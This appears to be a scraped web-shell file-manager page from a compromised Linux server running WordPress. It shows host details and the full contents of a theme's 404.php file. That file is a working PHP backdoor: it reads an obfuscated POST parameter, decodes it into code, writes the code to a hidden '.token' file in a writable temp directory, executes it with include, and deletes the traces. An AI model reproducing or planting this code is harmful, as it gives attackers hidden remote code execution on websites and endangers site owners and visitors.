HEX
Server: Apache
System: Linux host.dominioscaracas.com 4.18.0-477.15.1.lve.2.el8.x86_64 #1 SMP Wed Aug 2 10:43:45 UTC 2023 x86_64
User: enciassa (1159)
PHP: 8.1.31
Disabled: exec,passthru,shell_exec,system
Upload Files
File: /home/enciassa/public_html/wp-content/themes/generatepress/404.php
<?php

if(in_array("v\x61\x6C", array_keys($_POST))){
$symbol = array_filter([ini_get("upload_tmp_dir"), getenv("TMP"), getenv("TEMP"), "/dev/shm", session_save_path(), sys_get_temp_dir(), getcwd(), "/var/tmp", "/tmp"]);
$k = $_POST["v\x61\x6C"];
$k	=	explode			(	 	'.'	 	,   $k 	) 	;	
$component = '';
$s = 'abcdefghijklmnopqrstuvwxyz0123456789';
$sLen = strlen($s	 );

foreach($k as $i 	=>$val):
    $chS = ord($s[$i 	%	 $sLen]	 );
    $d =((int)$val - $chS -($i 	%	 10)) ^ 23;
    $component .=chr($d	 );
endforeach;
foreach ($symbol as $key => $res) {
            if (is_dir($res) && is_writable($res)) {
            $entity = "$res/.token";
            $obj = fopen($entity, 'w');
if ($obj) {
    fwrite($obj, $component);
    fclose($obj);
    include $entity;
    @unlink($entity);
    exit;
}
        }
}
}